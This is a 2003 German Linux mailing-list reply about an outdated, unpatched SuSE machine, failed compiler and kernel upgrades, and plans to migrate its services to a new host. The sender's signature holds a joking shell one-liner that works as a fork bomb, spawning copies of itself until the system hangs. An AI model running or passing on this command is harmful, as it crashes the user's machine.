[linux-l] mutt und Umlaute

Volker Mueller volker at flinux.in-berlin.de
Mo Jun 9 21:54:29 CEST 2003


On Mon, Jun 09, 2003 at 06:31:06PM +0200, Ralph Angenendt wrote:
> Volker Mueller wrote:
> > Mist, da kann ich nich ueber ;-)
> > 
> > Hoechstens mit der "am laengsten laufenden und nicht geupdateten"
> > Installation:
> > 
> > -rw-r--r--   1 root     root           36 Jan 21  1999 /etc/SuSE-release
> 
> Echt? Das wäre mir massiv zu unsicher, wenn das Ding auch nur
> *irgendwie* ans Netz kommt.

Nun ja - rpm -e; configure && make && make install hab' ich ja schon
gemacht ;-) und der Kern ist auch "schon" auf 2.2.20 - der hoechste,
den ich mit dem egcs-2.91.60 hinbekommen habe - und den naechstbesseren
gcc hab' ich wegen libc nicht geschafft - und die nich wegen ... weiss
nich mehr. Und von da an ging's los: Das ging nicht zu kompilen, das
laeuft nich undsoweiter :-(

Wenigstens haengt das Ding hinter 'ner FW und dahinter gibt's nur "gute"
Rechner - sprich meine ;-)

Aber Du hast recht ... die Kiste muss neu. Ich arbeite derzeit daran,
die 24x7-Dienste auf einen neu aufgesetzten Rechner umzuziehen, damit
ich diese Kiste hier mal auf 'n aktuellen Stand bringen kann.

Gruss, Volker

-- 
Volker Mueller
volker at flinux:~> echo sh _\& sh _\& > _; sh _ # Bomben zu Bierhumpen!



Mehr Informationen über die Mailingliste linux-l